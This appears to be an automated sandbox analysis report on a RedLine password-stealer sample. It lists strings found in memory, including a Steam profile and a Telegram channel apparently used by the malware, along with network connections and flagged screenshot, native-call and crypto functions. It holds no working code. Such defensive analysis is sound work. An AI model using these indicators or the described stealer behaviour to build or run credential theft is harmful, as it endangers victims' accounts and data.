Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6q6r
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=wC7D7_Fi9JOs&l=e
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/autofac/Autofac
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://github.com/tmds/Tmds.DBus
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://github.com/tmds/Tmds.DBus/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://github.com/tmds/Tmds.DBus/issues/15.
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888g
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JKKFIIEB.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://system.data.sqlite.org/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://system.data.sqlite.org/X
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfail
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/irfailAt
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://urn.to/r/sds_see=isolation
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://www.sqlite.org/lang_corefunc.html
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49754 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00411D10

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6C81ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C85B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C85B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C85B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C7FF280

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6154D	0_2_00F6154D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F73080	0_2_00F73080
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F97261	0_2_00F97261
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6122F	0_2_00F6122F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F983DF	0_2_00F983DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6E388	0_2_00F6E388
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F694C8	0_2_00F694C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F977B2	0_2_00F977B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F998E8	0_2_00F998E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F97D03	0_2_00F97D03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F65F8F	0_2_00F65F8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6DF00	0_2_00F6DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D38A	3_2_0041D38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F4C0	3_2_0041F4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CE39	3_2_0041CE39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DFB7	3_2_0041DFB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F35A0	3_2_6C7F35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C806C80	3_2_6C806C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C836CF0	3_2_6C836CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C86AC00	3_2_6C86AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C835C10	3_2_6C835C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C842C10	3_2_6C842C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C830DD0	3_2_6C830DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80FD00	3_2_6C80FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81ED10	3_2_6C81ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C815E90	3_2_6C815E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C854EA0	3_2_6C854EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C80FEF0	3_2_6C80FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FBEF0	3_2_6C7FBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C837E10	3_2_6C837E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C859E30	3_2_6C859E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C842E4E	3_2_6C842E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C819E50	3_2_6C819E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C833E50	3_2_6C833E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C866E63	3_2_6C866E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C826FF0	3_2_6C826FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C809F00	3_2_6C809F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FDFE0	3_2_6C7FDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8358E0	3_2_6C8358E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C807810	3_2_6C807810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C83B820	3_2_6C83B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C844820	3_2_6C844820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C818850	3_2_6C818850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81D850	3_2_6C81D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C852990	3_2_6C852990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82D9B0	3_2_6C82D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C81A940	3_2_6C81A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FC9A0	3_2_6C7FC9A0
